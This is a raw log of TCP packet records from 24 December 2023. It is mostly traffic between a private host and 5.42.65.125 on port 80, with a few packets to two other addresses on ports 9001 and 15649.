Dec 24, 2023 10:44:33.226109028 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.228216887 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.228329897 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.228384972 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.230560064 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.230667114 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.230717897 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.232891083 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.233000994 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.233056068 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.235197067 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.235255003 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.235316992 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.237884045 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.237948895 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.238008976 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.239787102 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.239847898 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.239907026 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.242072105 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.242126942 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.242219925 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.243884087 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:33.244285107 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.244365931 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.244411945 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.246499062 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.246558905 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.246635914 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.248768091 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.248861074 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.249248028 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.250868082 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.250931025 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.251208067 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.253067970 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.253168106 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.253221035 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.255208969 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.255261898 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.255312920 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.257324934 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.257345915 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.257400036 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.259481907 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.259543896 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.260303974 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.261615992 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.261703968 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.261765957 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.263675928 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.263729095 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.263771057 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.265759945 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.265816927 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.265858889 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.268094063 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.268142939 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.268223047 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.269929886 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.270018101 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.270073891 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.271898985 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.272023916 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.272078037 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.273874998 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.273950100 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.274086952 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.275919914 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.276034117 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.276182890 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.277925968 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.277990103 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.278038979 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.279753923 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.279776096 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.279932976 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.281740904 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.281800985 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.281914949 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.283701897 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.283756018 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.283796072 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.285567999 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.285634995 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.285769939 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.287523985 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.287605047 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.287708044 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.289450884 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.289515018 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.289632082 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.291316986 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.291385889 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.291446924 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.293159962 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.293230057 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.293659925 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.295051098 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.295103073 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.295150042 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.296828032 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.296889067 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.297043085 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.298897982 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.298995972 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.299144983 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.300467014 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.300528049 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.300666094 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.302402973 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.302488089 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.302542925 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.304698944 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.304752111 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.304797888 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.306041956 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.306117058 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.306159973 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.307692051 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.307756901 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.307909012 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.309503078 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.309595108 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.311264992 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.311317921 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.311331987 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.313052893 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.313106060 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.313116074 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.313249111 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.314729929 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.314776897 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.316461086 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.316502094 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.316597939 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.317253113 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.318185091 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.318249941 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.318295002 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.319926023 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.320077896 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.320147038 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.321558952 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.321610928 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.321679115 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.323256016 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.323312044 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.323374033 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.324913025 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.324986935 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.325037003 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.327887058 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.327966928 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.328020096 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.331541061 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.331619978 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.331665993 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.334645033 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.334702015 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.336579084 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.337795973 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.337856054 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.337918997 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.341025114 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.341100931 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.341511965 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.344394922 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.344573975 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.344855070 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.347413063 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.347471952 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.347532988 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.350738049 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.350806952 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.350864887 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.353883028 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.353991985 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.354033947 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.357177973 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.357266903 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.357331991 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.359878063 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.359952927 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.360059023 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.362957954 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.363071918 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.363130093 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.366336107 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.366381884 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.366441011 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.369435072 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.369488955 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.369709969 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.372371912 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.372514009 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.372565031 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.375209093 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.375272989 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.378351927 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.378432989 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.378473997 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.378650904 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.381359100 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.381433010 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.381474018 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.384257078 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.384378910 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.386739016 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.387429953 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.387516022 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.387553930 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.390150070 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.390212059 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.390284061 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.393177986 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.393311977 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.393397093 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.396003962 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.396054983 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.396121979 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.398879051 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.398935080 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.398977995 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.401787043 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.401825905 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.404544115 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.404583931 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.404597044 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.404635906 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.407319069 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.407397985 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.407793045 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.410283089 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.410362005 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.410427094 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.412745953 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.412866116 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.413105011 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.413538933 CET	15649	49723	212.118.39.73	192.168.2.5
Dec 24, 2023 10:44:33.413599968 CET	49723	15649	192.168.2.5	212.118.39.73
Dec 24, 2023 10:44:33.415540934 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.415580034 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.415631056 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.418071032 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.418138027 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.418191910 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.420625925 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.420722961 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.420769930 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.423911095 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.424029112 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.424077034 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.426029921 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.426110983 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.428592920 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.428739071 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.428809881 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.429101944 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.431490898 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.431571960 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.433860064 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.433928967 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.433939934 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.433976889 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.436470032 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.436541080 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.436583996 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.439213991 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.439306021 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.439371109 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.441571951 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.441669941 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.441735029 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.444161892 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.444216013 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.444277048 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.446702957 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.446768999 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.446820974 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.449338913 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.449455976 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.451814890 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.451842070 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.451869011 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.452213049 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.454083920 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.454159021 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.454205990 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.456877947 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.456995964 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.457051039 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.459038973 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.459142923 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.459253073 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.461527109 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.461596012 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.461671114 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.463907003 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.464040995 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.464112997 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.466589928 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.466691971 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.466757059 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.468789101 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.468853951 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.468899965 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.470921993 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.470999956 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.471059084 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.473305941 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.473361015 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.473417044 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.475575924 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.475634098 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.475680113 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.477794886 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.477860928 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.477905035 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.480568886 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.480626106 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.482430935 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.482477903 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.482500076 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.482537985 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.484751940 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.484821081 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.484882116 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.486996889 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.487082005 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.487145901 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.489025116 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.489108086 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.489156008 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.491857052 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.491957903 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.492017031 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.493741035 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.493818045 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.493927002 CET	49724	80	192.168.2.5	5.42.65.125
